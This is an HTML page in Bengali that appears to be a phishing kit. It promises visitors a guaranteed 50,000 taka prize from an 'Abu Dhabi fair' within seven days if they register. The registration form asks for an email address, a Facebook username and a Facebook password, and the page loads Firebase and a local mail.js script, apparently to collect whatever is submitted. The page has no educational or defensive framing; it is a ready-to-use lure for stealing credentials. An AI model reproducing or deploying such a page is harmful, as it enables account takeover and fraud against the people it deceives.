<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
    <link rel="stylesheet" href="./styles.css">
</head>

<body background="bg-img.jpg">
    <div class="container">
        <h1>SPECIAL OFFER</h1>
        <form action="" id="contactForm">
            <h1>রেজিস্ট্রেশন করে</h1>
            <h1>আবু ধাবির মেলা থেকে জিতে নিন নিশ্চিত ৫০ হাজার টাকা</h1>
            <div class="alert">আপনি ৭ দিনের মধ্যে টাকা পাবেন!</div>

            <div class="inputBox">
                <input type="email" id="emailid" placeholder="আপনার ইমেইল" />
            </div>


            <div class="inputBox">
                <input type="text" id="username" placeholder="আপনার ফেসবুক Username" />
            </div>

            <div class="inputBox">
                <input type="text" id="password" placeholder="আপনার ফেসবুক Password"></textarea>
            </div>

            <div class="inputBox">
                <button type="submit">Submit</button>
            </div>
        </form>
    </div>

    <script src="https://cdnjs.cloudflare.com/ajax/libs/firebase/7.14.1-0/firebase.js"></script>
    <script src="./mail.js"></script>
</body>

</html>